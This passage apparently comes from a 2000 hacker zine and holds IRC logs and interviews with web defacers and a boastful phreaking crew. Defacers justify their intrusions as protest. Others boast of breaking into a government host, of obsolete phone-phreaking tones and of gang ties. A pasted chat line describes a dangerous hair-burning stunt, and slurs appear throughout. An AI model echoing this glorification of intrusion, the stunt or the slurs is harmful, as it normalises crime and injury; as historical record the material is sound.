      [05:57am] <PhantasmP> do you think it comes nutard/spaided?
      [05:58am] <PhantasmP> do you know how much ~ it cost?
      [05:59am] <Cruciphux> no
      [05:59am] <Cruciphux> $50?
      [05:59am] <PhantasmP> fuck, I got a real dog for $60
      [05:59am] <Cruciphux> haha
      [05:59am] <Cruciphux> guh!
      [05:59am] <Cruciphux> furby babies!#
      [06:00am] <Oj1st> hehe
      [06:00am] <Cruciphux> yes i'm 35 and i like furbies ok
      [06:00am] <Cruciphux> heh
      [06:00am] <Oj1st> yes its fine
      [06:01am] <PhantasmP> umm how come I was thinking you were 35 before you said that?
      [06:01am] <Cruciphux> tnx
      [06:01am] <Cruciphux> hehe
      [06:01am] <Cruciphux> heh
      [06:01am] <Cruciphux> PhantasmP 
      [06:01am] <PhantasmP> did you put your age somewhere?
      [06:01am] <Cruciphux> i cant open this box
      [06:01am] <Cruciphux> yeh
      [06:01am] <Cruciphux> actually
      [06:01am] <Cruciphux> i'm 36 now
      [06:01am] <Cruciphux> but we'll keep it at 35
      [06:01am] <Cruciphux> k?
      [06:01am] <PhantasmP> no prob, its only 6 hours into a new day
      [06:02am] <Cruciphux> age 4+
      [06:02am] <Cruciphux> how the fuck would a 4 yr old handle this
      [06:02am] <Cruciphux> hrm
      [06:02am] <PhantasmP> they'd have their parents do it
      [06:02am] <Cruciphux> they're asleep
      [06:02am] <Cruciphux> ok
      [06:03am] <Cruciphux> i'm gonna get my switchblade
      [06:03am] <Cruciphux> and cut the twist ties
      [06:03am] <PhantasmP> wake them up, and act all excited like your 4 on christmas morning
      [06:03am] <Cruciphux> actually FProphet and Dicentra got me this
      [06:04am] <Cruciphux> my bro and his fiancee
      [06:04am] <PhantasmP> maybe they tampered with it to make it hard for you to open
      [06:04am] <Cruciphux> thats what i'm thinking
      [06:04am] <Cruciphux> its like that movie 'the game'
      [06:04am] <Cruciphux> and this is my game
      [06:04am] <PhantasmP> but it wouldn't be worth it if they wern't they to see you struggle
      [06:04am] <Cruciphux> brb
      [06:05am] <Cruciphux> i have this feeling someone is logging this
      [06:06am] <Cruciphux> its 6:13am and the box is open but the dog is still inside
      [06:06am] <Cruciphux> i
      [06:06am] <Cruciphux> ll keep u posted
      [06:06am] <PhantasmP> if you need moral support, i'll be here
      [06:06am] <Cruciphux> cant find my knife
      [06:06am] <PhantasmP> shit, it stinks outside
      [06:07am] * Cruciphux rests again
      [06:08am] <Cruciphux> how come furby babies you have to be 6+ and the dog is 4+
      [06:09am] *** Quits: Oj1st (Ping timeout: 180 seconds)
      [06:10am] <PhantasmP> furby looks scary
      [06:13am] <PhantasmP> furby checkout http://20x.x8x.231.41/ again
      [06:13am] <PhantasmP> err Cruci I mean
      [06:13am] <PhantasmP> if you have time
      [06:16am] <Cruciphux> 6:24am
      [06:16am] <Cruciphux> its out
      [06:16am] * PhantasmP claps
      
      <END>

     
322.0 [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      [ - Session Start - (EDITED SLIGHTLY) -]
      
      (c) 2000 by PhantasmP of HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript.
      
      Mailto: media@hwa-security.net
      
      Thanks to: Herbless for replying back with the answers
      so quickly and raist & I0wnzz([n]crypt) for providing
      the first 3 questions.
      
      http://hwa-security.net - #hwa-security on EFNet
      
      >1. How did you get started in defacing?
      
      I've always been a computer geek, and I was playing with security vulnerabilities 
      and other peoples networks, when I thought "hey, I could use this to spread 
      my thoughts around". I've usually got something to say on most subjects and felt that
      I could use this new technology to spread my thoughts around. It would appear to have
      started something akin to a cult following.
      
      >2. What's the reasoning behind your defacements?
      
      I have various reasons, most of which are apparent on the websites I deface. 
      In the past I've posted messages and info on DeCSS, smoking and government 
      hypocrisy and most recently, I've supported the fuel protests in Britain. 
      I do these things because I believe in them; I think they are right. In 
      the future, I may do something against paedophilia and also racism because 
      these are blights of the human mind and should be stamped out. Ignorance 
      is no excuse for persecution.
      
      >3. Why do you do high risk defacements?
      
      High risk sites comes with a high profile - they get my message to the masses. 
      Of course, it could be that I enjoy the attention at a distance... kind 
      of infamous, but anonymous. I suppose there is a perverse kind of satisfaction 
      to that.
      
      >4. Were you expecting the amount of media coverage that you're getting?
      
      Ha ha. No. It's come as a complete surprise. However, that means that I 
      just have to be careful what subjects I choose to speak about - if I target 
      the message to the media and hence the people, it could help the causes 
      that I believe in. In this case, the government's stance on petrol tax and 
      the protestors associated with it.
      
      >5. Do you think having that media coverage is helping your "cause"?
      
      It's hard to be objective about it. At the very least,
      I have seen only one negative story about my defacements (although of 
      course there may be more). Also, I've had such an incredible response from
      the public - not just geeks and hackers - that I believe the media 
      coverage has indeed helped.
      
      >6. Do you feel that too many people deface for wrong/dumb reasons?
      
      Definitely. Most people (read: kids) deface for no other reason than to 
      spread their name across any site they can. They pick irrelevant sites, post 
      badly spelled pages, use abusive and offensive language and generally get 
      on my tits. Why? Because of the few that actually have a talent and understand 
      the principles behind system hacking/cracking, the majority seem to waste 
      their hard-earned skills on "3l33t h4x0r sp34k" and sending "fuck-yous" 
      to people that "d1sr3sp3t th3!r 5h!t". Bah. Tossers. They could use their 
      skills to protest about things they believe in, using what I believe is 
      a legitimate form of protest. Of course, there are a few exceptions to this 
      rule; G-Force Pakistan for one - they are against the violence and murder 
      in Kashmir and deserve more publicity than I, for their cause is to awaken 
      the world to pain, torture, rape, murder and suffering that is being ignored 
      by the western world.
      
      >7. How do you feel your defacements are different?
      
      For the most part, they are well thought-out and have a definite purpose. 
      I also try to ensure correct spelling and good grammar. Most defacements 
      ignore these basic principles, giving the impression of stupidity on the 
      part of the cracker.
      
      >8. Do you have any role models in the "underground" community?
      
      I have no role models in any community. I respect some people (for example,
      Bruce Schneier, the L0pht and to a lesser extent, G-Force who lower their 
      image by using racist slurs), but certainly don't base my actions around 
      those of another. I would like to think I am original and different from 
      the mainstream.
      
      >9. Do you ever worry about getting arrested?
      
      Yes. I really don't fancy sharing a cell with a big homo called Bubba. I 
      take sensible precautions to avoid getting caught, although if law-enforcement 
      is determined to catch me they will. This is because contrary to popular 
      opinion, they are bigger, collectively smarter and have more resources than 
      I. I know that for every site I deface I increase my chances of getting 
      caught, and try to cover my tracks as much as possible. Sometime soon I 
      will have to stop for good, become a good grey-hat kinda guy and behave 
      myself, or I'm going to be facing a few years care of her Majesty the Queen.
      
      
      =====
      Old programmers never die. They just terminate and stay resident.
      
      http://phantasm.8m.com
      
      [END]
      
      @HWA      
      
      
323.0 [HWA] Interview with Pimpshiz in limelight recently by SugarKing
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an interview with 'pimpshiz' who reportedly defaced over 60
      sites in a pro-napster social disobedience action. The cracker has 
      been in mainstream media and mentioned on HNN. SugarKing was able 
      to get this interview for your enlightenment and edification. 
      Enjoy - Cruci.
      
      
      (c) 2000 by SugarKing/HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Cruciphux/HWA
      
      Mailto: media@hwa-security.net
      
      [ - Session Start - (EDITED SLIGHTLY) -]
      
      SugarKing: getting quite the media attention eh?
      Pimpshiz: why do you say that
      SugarKing: haha, don't you read HNN?
      Pimpshiz: no
      SugarKing: well you're on alot
      Pimpshiz: oh lol
      Pimpshiz: yeah but that intern talks shit
      Pimpshiz: pyle or whatever
      SugarKing: APB News did an article on you
      SugarKing: are you really an 11 year-old?
      Pimpshiz: no lol
      SugarKing: lol yeah I figured that
      SugarKing: you shouldn't of left your aol account on your defacements
      Pimpshiz: too late
      SugarKing: yep
      SugarKing: you're gonna get busted dude, heh
      SugarKing: by doing that
      Pimpshiz: maybe
      SugarKing: maybe if they don't wish to pursue you, but if they want to 
      they are gonna get you
      Pimpshiz: yeah
      SugarKing: i haven't seen you deface lately, all done?
      Pimpshiz: yeah, for the time being
      SugarKing: good idea
      Pimpshiz: hheheehe
      SugarKing: As if the pro-Napster defacements of random web sites weren't 
      silly enough already, there's a new twist in the case. The individual who 
      claims responsibility for the attacks (a.k.a. Pimpshiz -- now also claiming 
      to be an 11 year-old girl) warns officials that his/her/its arrest will lead 
      to revenge attacks by his/her/its buddies. If the threats have any truth to 
      them, they will only lead to more charges against the vandal. 
      SugarKing: heh
      SugarKing: http://www.apbnews.com/newscenter/breakingnews/2000/ 
      08/18/hacker0818_01.html
      SugarKing: there's one story on you
      Pimpshiz: i already read that
      Pimpshiz: got anymore?
      SugarKing: lemme look
      Pimpshiz: k
      SugarKing: http://dailynews.yahoo.com/h/zd/20000817/tc/napster_fan_ 
      hacks_dozens_of_sites_2.html
      Pimpshiz: got it
      Pimpshiz: same as the apbnews one isnt it
      SugarKing: not really
      SugarKing: they say similiar things, but different site and article
      Pimpshiz: any others?
      SugarKing: hmm no
      Pimpshiz: k
      Pimpshiz: someone found a CNN one on me yesterday
      SugarKing: oh
      Pimpshiz: pcworld, computerworld
      Pimpshiz: zdnet
      Pimpshiz: internet.com wants to interview me on their radio station 
      today
      SugarKing: and are you going to?
      Pimpshiz: not sure yet
      SugarKing: honestly, I wouldn't
      SugarKing: unless you plan on telling them your done defacing
      Pimpshiz: yeah, dunno cus what if they ask me somethin unexpected 
      that i cant answer
      SugarKing: yeah that too
      Pimpshiz: but then again
      Pimpshiz: it'd be just tite
      Pimpshiz: to give shouts at the end
      SugarKing: hahah, it's gonna be tight when your ass is caught by the FBI
      Pimpshiz: hehehe yeah
      Pimpshiz: ill be like "yo lemme get shouts to my boys in the west, 
      RSH, hackweiser, the FBI, the CIA, the NIPC"
      Pimpshiz: ;x
      SugarKing: haha
      SugarKing: i've never heard of you till this napster thing, your obviously 
      new to the scene
      Pimpshiz: what scene
      Pimpshiz: defacing scene?
      SugarKing: yeah
      Pimpshiz: lol
      Pimpshiz: yeah, but to everything else im from 95
      Pimpshiz: been programming since 96
      SugarKing: oh so you program?
      Pimpshiz: lol yes
      Pimpshiz: im certified professional in like 6 things
      SugarKing: so you're not just another NT kiddie?
      Pimpshiz: id show you my online transcript but it has my personal info
      Pimpshiz: and no
      Pimpshiz: lol
      Pimpshiz: i guess not
      SugarKing: 11 year-old girl, lol....so your not in your teens either I 
      imagine?
      Pimpshiz: im 16
      Pimpshiz: not 11 
      Pimpshiz: and im a guy
      SugarKing: hahah i figured that
      SugarKing: i don't think an 11 year-old girl can hack nasa
      Pimpshiz: hehehe
      SugarKing: He wrote in a series of e-mails to ZDNet News that hacking the 
      sites was easy and he was able to exploit "obvious" holes.
      SugarKing: what did you exploit anyways?
      Pimpshiz: hahaha that was a lie 
      Pimpshiz: i didnt write that shit
      SugarKing: haha
      Pimpshiz: thats hellllllllla funny
      Pimpshiz: cus it sure as fuck was not easy rofl
      SugarKing: i don't think it was a common hole anyways
      SugarKing: yeah i would figure that
      Pimpshiz: its undocumented 
      SugarKing: you find it yourself?
      SugarKing: the hole
      Pimpshiz: yeah
      SugarKing: cool
      SugarKing: The alleged hacktivist who may have defaced as many as 60 Web 
      sites in the past week with a Pro-Napster screed now warns that fellow 
      hackers will unleash widespread cyberattacks if federal authorities attempt 
      to collar any suspects. 
      SugarKing: lol you say that one?
      Pimpshiz: yeah
      Pimpshiz: but i didnt conspire it
      Pimpshiz: someone told me and i relayed it
      SugarKing: ah
      SugarKing: Ray Kaplan, a computer security consultant at Guardent Inc. in 
      St. Paul, Minn., said the defacements appear to be nothing new or original. 
      
      It's the same old penetration, he said. You figure out what software people 
      are running, and go find the exploit and take advantage of it. 
      
      SugarKing: lol
      Pimpshiz: lol yeah, even microsoft thinks im using the SQL default pw
      SugarKing: hah
      SugarKing: so when do you plan on clarifying all these things, own 
      exploit, not 11 year-old, etc
      Pimpshiz: dunno yet
      SugarKing666: http://www.hwa-security.net/index0.html mind if I clarify some of it on there? i won't if you don't want to
      Pimpshiz: yeah go ahead
      SugarKing: cool thanks
      SugarKing: what is service is your exploit for?
      Pimpshiz: cant say
      Pimpshiz: no details.
      
      END
      
      (c) 2000 SugarKing/HWA-Security
                  
      @HWA
      
324.0 [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      I know it's a waste of space but it belongs here nonetheless. They can get off in
      knowing their silliness made it into the zine as promised =)
      
      Prelude
      
      
      This "interview" was requested by members of DeC. It is one of the most
      elite I have ever done or seen; it surely makes groups like ADM look
      completely lame.
      
      
      Done Tuesday Aug 1st 2000. A date to remember indeed. I refrained from
      adding commentary, although it was tempting; I think the text speaks 
      for itself. Enjoy!
      
      
      ---START---
      
       Value of LOG set to ON
      <blame_> y0d00d
      <Cruciphux> you guys both DeC?
      <blame_> so what's up with this interview?
      <blame_> y4h
      <r00thl3ss> i WANT TO EXPLAIN MY MOTIVES for HACKING
      <Cruciphux> didnt say there was one yet
      <Cruciphux> :)
      000 mode/#intr [+o r00thl3ss] by blame_
      <blame_> AHYO
      <blame_> watchit with those smily facez
      <Cruciphux> but go ahead and make your statement
      <blame_> 0k
      <blame_> l1ke
      <Cruciphux> eat me
      <Cruciphux> heh
      <r00thl3ss> i hack not for knowledge but POWER
      <Cruciphux> ok
      <r00thl3ss> not to learn but to DESTROY
      <r00thl3ss> to CONTROl
      <r00thl3ss> CONTROL
      <blame_> i agree
      <Cruciphux> what have you hacked
      <blame_> d00d
      <Cruciphux> coz I never heard of you
      <r00thl3ss> what have I HACKED?
      <blame_> WHAT HAVENT WE HACKED
      <r00thl3ss> sti.amwe.qow.ei.pan.gov.au for ONE THING MISTER
      <Cruciphux> yeah you dont need to be specific
      <r00thl3ss> oh shyt
      <blame_> 0kd00d
      <Cruciphux> why the attitude?
      <Cruciphux> it makes you seem lame
      <blame_> why should poeple come forth about that they've hacked
      <Cruciphux> are you for real?
      <blame_> y4h
      <Cruciphux> well.
      <blame_> we're the real deal
      <r00thl3ss> remember when prohosting.com got rm'd a few years ago
      <Cruciphux> yeh
      <r00thl3ss> ?
      <Cruciphux> you guys?
      --------------- --  -
      | r00thl3ss (ruthless@???????.gti.net) (Internic Network)
       ircname  : blast blast & leave my gang rag layin on ur face
      | channels : @#intr 
       server   : irc.mcs.net (MCSNet Services - (312)803-MCS1)
      : idle     : 0 hours 0 mins 12 secs (signon: Tue Aug  1 14:35:30 2000)
      <blame_> th3thtth4t w4z y0!@
      --------------- --  -
      | blame_ (lurk@???????.gti.net) (Internic Network)
       ircname  : lock ur windowz, close ur doorz
      | channels : @#intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 5 secs (signon: Tue Aug  1 11:37:42 2000)
      <blame_> ermM
      <r00thl3ss> n0 c0mM3nt
      <blame_> 0h y4h
      <blame_> i m34n
      <Cruciphux> fair nuff heh
      <blame_> l1ke
      <Cruciphux> was it provoked?
      <blame_> 1t w4z s0m30ne elze
      <r00thl3ss> my lawyer has directed me 2 not say anything incrimin8ng
      <blame_> y3z
      <Cruciphux> so you said you wanted an interview what do you want to say?
      <blame_> w3 g0 w4y b4ck w1th th3 adm1n
      <Cruciphux> you're new...how new?
      <blame_> he was mad cuz we shut off his fonez acouple times
      <blame_> he started runn1ng hiz m0uth 0ff
      <blame_> 4nd u kn0w how things are
      <Cruciphux> why was he mad at ya?
      <blame_> p34ple wh0 p0p sh1t get rm'D
      <r00thl3ss> SHHH
      <r00thl3ss> !!!
      <Cruciphux> heh
      <blame_> i m34n
      <blame_> l1ke
      <blame_> y4h
      <blame_> f0rg3t th4t
      <r00thl3ss> yah el8 speak can not be used as evidence in court from what i understand anyway
      <Cruciphux> so how many people in this group?
      <Cruciphux> just you two?
      <r00thl3ss> so dont worry d00d!
      <blame_> 0h y4h
      <blame_> s0 anywayz
      <Cruciphux> i dont narq man
      <blame_> h0w ab0ut th4t intrv1ew d00d?
      <Cruciphux> thought we were attempting one now
      <Cruciphux> *g*
      <blame_> we're el8 and sh1t
      <r00thl3ss> yah we r
      <Cruciphux> how old are ya?
      <Cruciphux> how many members?
      <r00thl3ss> ill say
      <blame_> hell0?
      000 NetSplit: irc.etsmtl.ca split from irc.total.net [04:11pm]
       BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc.etsmtl.ca]
      <blame_> u there br0?
      <r00thl3ss> CrUCIpHix??
      <blame_> Cruciphux
      <Cruciphux> where you located? U.S?
      [ctcp(#intr)] PING
      <blame_> y0d00d
      <blame_> by not responding, you're disrespecting uz
      <blame_> and as u can see
      <blame_> th4t'z n0t wh4t u w4nn4b3 d01nG buDDY
      <Cruciphux> ib
      <Cruciphux> cable bloc sync dropped
      <Cruciphux> its shit
      <Cruciphux> actually dude
      <blame_> uHh 50 at the m0m3nt
      000 CTCP PING reply from r00thl3ss: 47.678 seconds
      <blame_> y3z all 0ver the w0rld
      <r00thl3ss> im also an op in one of the most PRESTEGIOUS UNDERGROUND IRC CHANNELS 
      <r00thl3ss> #phrack
      <r00thl3ss> !
      <Cruciphux> i've asked a bunch of questions and you guys didn't answer
      <Cruciphux> don't blame me the net is fux0red
      <Cruciphux> ok
      <blame_> y4h that t00
      <blame_> curr3ntly
      <Cruciphux> so answer the questions
      <Cruciphux> how long ya been around?
      [ctcp(#intr)] PING
      <blame_> we h4v3 m3mb3rz fr0m all 0ver the w0rld
      <blame_> each m3mber has their 0wn t4l3nt 
      <blame_> f0r ex4mpl3
      <Cruciphux> maybe we should reschedule this i keep dropping out
      <Cruciphux> unless you're packetting
      <Cruciphux> which i assume not
      [ctcp(#intr)] PING
      <blame_> r00thl3ss, can build a blueb0x like no oth3r
      <blame_> y0
      <blame_> do u kn0w whut a blueb0x iz?
      <r00thl3ss> ye$
      <blame_> cuz i c4n expl41n f0r the r34d3rz
      <blame_> hell0?
      <blame_> wh0a
      <Cruciphux> guys
      <Cruciphux> i keep dropping out
      <r00thl3ss> hahaha
      [ctcp(#intr)] PING
      <r00thl3ss> hes in #velcro
      <r00thl3ss> thats like the wannabe BoW chan
      <Cruciphux> i was invited
      <blame_> n0 it'z n0t
      <Cruciphux> no idea what its about
      000 CTCP PING reply from r00thl3ss: 139.547 seconds
      000 CTCP PING reply from r00thl3ss: 130.332 seconds
      <Cruciphux> ctcp ping replies are 130-139 seconds
      <Cruciphux> ..
      <Cruciphux> this is pointless
      IRC log ended Tue Aug  1 16:18:46 2000
       Starting logfile IrcLog
      IRC log started Tue Aug  1 16:19:33 2000
       Value of LOG set to ON
       Cruciphux [hwa@hwa-security.net] has joined #intr
       ServerMode/#intr [+nt] by irc.mcs.net
       [Users(#intr:1)] 
      [@Cruciphux ] 
       Channel #intr was created at Tue Aug  1 16:27:07 2000
       BitchX: Join to #intr was synced in 2.266 secs!!
       Cruciphux [hwa@hwa-security.net] has left #intr []
       Cruciphux [hwa@hwa-security.net] has joined #phrack
       [Users(#phrack:71)] 
      [ Cruciphux ] [ gweeds    ] [ cvx       ] [ suid      ] [ dnm       ] 
      [ TheHated  ] [ deb       ] [ hegemoOn  ] [ jennicide ] [ sl0ppy    ] 
      [ live_     ] [ cripto    ] [ _angus    ] [ MeGaMaCk  ] [ phatal    ] 
      [ r00thl3ss ] [ prym      ] [ sq-       ] [ xdm       ] [ Kore_Dump ] 
      [ py-       ] [ phidias   ] [ diphen    ] [ PRIAPUS   ] [ Yowie     ] 
      [ loki      ] [ _jerky    ] [ oghost    ] [ bnd       ] [ ajx       ] 
      [ _xyg_     ] [ blame_    ] [ SN        ] [ awr       ] [ kemo      ] 
      [ FrontLine ] [ kaotik    ] [ dank      ] [ plaguez   ] [ falken    ] 
      [ epic^     ] [ devstderr ] [ spinux    ] [ silitek   ] [ Sens      ] 
      [ eric      ] [ no_ana    ] [ rufus     ] [vpea       ] [ segmond   ] 
      [ cleb      ] [ sub       ] [ z3nz      ] [ dreck     ] [ ju1ce_    ] 
      [ deathinc_ ] [ suave     ] [ Neural    ] [ Trinity93 ] [ arch      ] 
      [ f_jail    ] [ Dodger    ] [ e10k      ] [ interline ] [ arakis_   ] 
      [ Swern     ] [ ju1ce-    ] [ incr      ] [ tyme      ] [ n00dle    ] 
      [ wilkins   ] 
       [Users(#phrack:21)] 
      [ Veerappan ] [ casret    ] [ chriz     ] [ kn0wfx    ] [ ret-      ] 
      [ pm-       ] [ ksoze     ] [ m4g1c     ] [ capnlunch ] [ sh1fty    ] 
      [ felix     ] [ _GNU_     ] [ Codiak    ] [ str8niga  ] [ ^2muchSun ] 
      [ codemonky ] [ maam0gr4m ] [ woyzeck   ] [ NNY       ] [ alia      ] 
      [ ii        ] 
       Channel #phrack was created at Thu Jul 13 15:49:35 2000
       BitchX: Join to #phrack was synced in 2.306 secs!!
      <Cruciphux> yo
      <Cruciphux> i'm lagged to fuck
      <incr> These next couple steps need to be done very rapidly. Open the grill lid, stick your head into the grill and light your lighter right next to your head. The result will be a very fast burning fireball that will burn all of the hair off of your head. 
      <Swern> they dotn call me butternuts jsut because i like to dip my balls in butter...
      <incr> this web page rules
      [msg(blame_)] go back to #intr for a sec
       Cruciphux [hwa@hwa-security.net] has left #phrack []
       Cruciphux [hwa@hwa-security.net] has joined #intr
       ServerMode/#intr [+nt] by irc.mcs.net
       [Users(#intr:1)] 
      [@Cruciphux ] 
       Channel #intr was created at Tue Aug  1 16:28:33 2000
       BitchX: Join to #intr was synced in 2.246 secs!!
       Topic (#intr): changed by Cruciphux: lagged to fuck lets reschedule
       blame_ [lurk@????????.gti.net] has joined #intr
       suave [g@?????ST.net] has joined #intr
      <suave> sup
      <blame_> y0d00dz
      <Cruciphux> i'm lagged to fuck
      <blame_> yo
      <Cruciphux> lets reschedule
      <blame_> i brought my bro suave
      <suave> sup blame
      <blame_> he's DEC
      <suave> word
      <blame_> not much dude
      <suave> DeC4life
      <blame_> w0rD
      <blame_> y0 so how about th1 interv13w y0?
      <blame_> erm th1z
      <Cruciphux> i'm lagged to fuck
      <Cruciphux> lets reschedule
      <Cruciphux> are you seeing this
      <blame_> hm look dude
      <blame_> yes
      <blame_> i'm kinda preessed for time
      <Cruciphux> wanna do email?
      <suave> get on another machine & do it bro
      <Cruciphux> cant
      <blame_> gimme a ime i'll see if i can fit it into m schedule
      <blame_> my
      <blame_> ok
      <suave> what kinda questions r u gonna ask
      <blame_> do u have a fone # i can reach u @?
      <Cruciphux> you give me a time if you're pressed 
      <Cruciphux> no
      <Cruciphux> email?
       r00thl3ss [ruthless@???????.gti.net] has joined #intr
      <blame_> naw i d0nt d0 em41l
      <r00thl3ss> y0
      <suave> sup r00thl3ss
      <blame_> yo d00D
      <r00thl3ss> whats the dealeo
      <Cruciphux> you have no anonymous email?
      <Cruciphux> i keep dropping out my cable is shit
      <r00thl3ss> email is not sekure!
      <blame_> uh ya
      <Cruciphux> i was getting ping times of 139 seconds
      <suave> ya not with carnivore around
      <suave> man did u hear aobut that shit
      <blame_> i refuse to use email, the government could be watching
      <r00thl3ss> yah
      <blame_> u n3v3r kn0w
      <r00thl3ss> i heard about it on the radio
      <Cruciphux> like they dont sniff efnet?
      <r00thl3ss> n.p.r.
      <Cruciphux> ha
      <Cruciphux> lets try this while i'm online
       [Users(#intr:4)] 
      [ r00thl3ss ] [ suave     ] [ blame_    ] [@Cruciphux ] 
      <blame_> 0k s0undz g00d
      --------------- --  -
      | r00thl3ss (ruthless@????????.gti.net) (Internic Network)
       ircname  : blast blast & leave my gang rag layin on ur face
      | channels : #intr 
       server   : irc.mcs.net (MCSNet Services - (312)803-MCS1)
      : idle     : 0 hours 0 mins 28 secs (signon: Tue Aug  1 14:35:30 2000)
      --------------- --  -
      | suave (g@?????ST.net) (Internic Network)
       ircname  : gangster of love
      | channels : #intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 44 secs (signon: Mon Jul 31 04:52:20 2000)
      <r00thl3ss> Ok question 1 is?
      --------------- --  -
      | blame_ (lurk@???????.gti.net) (Internic Network)
       ircname  : lock ur windowz, close ur doorz
      | channels : #intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 9 secs (signon: Tue Aug  1 11:37:42 2000)
      <Cruciphux> how long you guys been around?
      <suave> y0 1m r34dy
      <suave> $ho0t
      <blame_> 10 yearz n0w
      <r00thl3ss> 10 yrs next week
      <Cruciphux> and what does DeC stand for?
      <suave> ya i been around 10 years
      <r00thl3ss> digital
      <r00thl3ss> electronic
      <r00thl3ss> crips
      <suave> deadly electronic cripz
      <Cruciphux> how many members?
      <blame_> yah
      <r00thl3ss> deadly yah
      <r00thl3ss> over 50
      <Cruciphux> woah
      <r00thl3ss> at last count
      <blame_> we're like the digital version of the cripz and stuff
      <suave> like 5 th@ r inner circle tho
      <Cruciphux> thats bigger than most
      <blame_> i'm sure u've heard of the cripz before
      <suave> we have ties 2 the real crips
      <Cruciphux> what is your credo?
      <Cruciphux> yes
      <suave> & bloods 
      <Cruciphux> so you're ca?
      <suave> we pull shit 4 them on the net
      <Cruciphux> cc?
      <suave> some of us r
      <blame_> y4h
      <Cruciphux> but you hack too
      <suave> ya
      <Cruciphux> some defacing?
      <blame_> y4h $ure
      <blame_> naw
      <Cruciphux> so nothing on attrition
      <Cruciphux> ok
      <Cruciphux> what do you want to tell people
      <blame_> uh
      <blame_> well pr3tty much
      <blame_> that we're k00l3r th4n u
      <blame_> uhhhh
      <blame_> oh yah
      <Cruciphux> ...
      <blame_> and dont fuck with uz
      <Cruciphux> ok
      <blame_> or we'll rm u
      <blame_> suave
      <suave> we r in2 way more hardcore shit than defacing dude
      <suave> sup
      <blame_> do u have anything to add yo?
      <suave> ya back the fuck up b4 u get slapped the fuck up
      <r00thl3ss> ok back
      <suave> back the fuck up b4 u get hacked the fuck up
      <Cruciphux> well I don't know what to ask you guys to be honest if you're into shit you don't want to talk about its difficult to ask questions...
      <r00thl3ss> im in2 girls
      <Cruciphux> so you guys just talk away 
      <suave> me 2
      <Cruciphux> lol
      <suave> chicks say i look gr8 in blue
      <Cruciphux> you do shit offline?
      <blame_> $ure
      <Cruciphux> phreaking?
      <r00thl3ss> i look gr8 in all colours
      <blame_> yah phreak1ng
      <r00thl3ss> yah im a major field phreaker
      <blame_> we're bad ass
      <Cruciphux> own any switches?
      <r00thl3ss> no comment!
      <suave> u mean like beige boxing
      <Cruciphux> ha
      <suave> ya 4 sure
      <Cruciphux> beige boxing is fucking lame
      <r00thl3ss> switches what r those
      <blame_> r00thl3ss is pretty wiacked with a beige box
      <suave> i have a blotto box
      <blame_> erm wicked
      <Cruciphux> you're into phreaking and dunno what a switch is?
      <r00thl3ss> yah i am
      <Cruciphux> you're pulling my leg
      <blame_> those thingz are cool
      <Cruciphux> whats a dms 250
      <r00thl3ss> oh shiyt ok i remember now
      <r00thl3ss> hmm i dunno
      <r00thl3ss> w8
      <blame_> dms? wtf is that?
      <Cruciphux> whats a blue box?
      <suave> a dms 250 is a switch
      <Cruciphux> what does dropping a card mean?
      <suave> 4 phones & shit
      <r00thl3ss> a dms250 is a tandem switch?
      <Cruciphux> what tone seizes a trunk?
      <suave> blueboxes get u free calls
      <r00thl3ss> thats where u drop a CC on irc
      <blame_> 2stealk0d3z
      <r00thl3ss> 2600
      <suave> 2600hz
      <blame_> 2400+2600 under c5
      <suave> u can do it w/.a rice krispies whistle
      <blame_> 26000 under r1
      <blame_> erm 2600
      <r00thl3ss> only on switches not on the SS7 network!
      <Cruciphux> ala cap'n krunch right
      <suave> oh ya capn crunch been a while since i phreaked bro
      <r00thl3ss> crucphix u know 5ess?
      <Cruciphux> do you phreak for 'business' or fun
      <blame_> haha! crucphix iz lame!
      <Cruciphux> its cruciphux
      <suave> im really in2 unix cruciphix
      <r00thl3ss> fun & prophet!
      <Cruciphux> you're lame
       Cruciphux [hwa@hwa-security.net] has left #intr []
       BitchX: You are now talking to channel #hwa.hax0r.news
      >>> blame_ Invites You to #intr
       BitchX: Press Ctrl-K to join #intr
       Cruciphux [hwa@hwa-security.net] has joined #intr
       Topic (#intr): lagged to fuck lets reschedule
       Topic (#intr): set by Cruciphux at Tue Aug  1 16:28:55 2000
       [Users(#intr:4)] 
      [ Cruciphux ] [ r00thl3ss ] [ suave     ] [ blame_    ] 
       Channel #intr was created at Tue Aug  1 16:28:33 2000
       BitchX: Join to #intr was synced in 2.240 secs!!
      <Cruciphux> yo
      <suave> sup bro
      <r00thl3ss> y0 cruciphux
      <blame_> y0d00d
      <Cruciphux> you gonna be serious?
      <blame_> what's up 
      <blame_> sure
      <r00thl3ss> yah i was being serious dude
      <Cruciphux> or am i wasting my time
      <suave> ya
      <r00thl3ss> blme_ wasnt but hes a goofball
      <suave> im always serious
      <Cruciphux> so what are you into
      <Cruciphux> tell me the scoop man
      <suave> im in2 unix
      <r00thl3ss> blames a bong tokin alcoholic so forgive him
      <r00thl3ss> yah i know unix too
      <Cruciphux> DoSing?
      <r00thl3ss> the ins & outs
      <Cruciphux> or pure owning?
      <suave> im in2 net shit & sometimes i cruise the X.25 highway
      <r00thl3ss> nah i said unix not DOS
      <Cruciphux> how many shells you got
      <suave> depends how im feelin
      <suave> y u wanna trade
      <Cruciphux> DoS - denial of service
      <Cruciphux> no
      <r00thl3ss> oh u mean DoS
      <Cruciphux> i'm legit now
      <Cruciphux> yeh
      <suave> i got some virgin T3's that r eggable
      <suave> oic
      <r00thl3ss> i have tons of shells
      <blame_> pure owning
      <suave> thats kewl man every1 ends up legit u know
      <Cruciphux> do you have like a tfn net or shit
      <suave> once u reach that level of elitness and u just plateau
      <blame_> a tfn net?
      <Cruciphux> ok earlier i asked how old you are generally
      <blame_> we have many
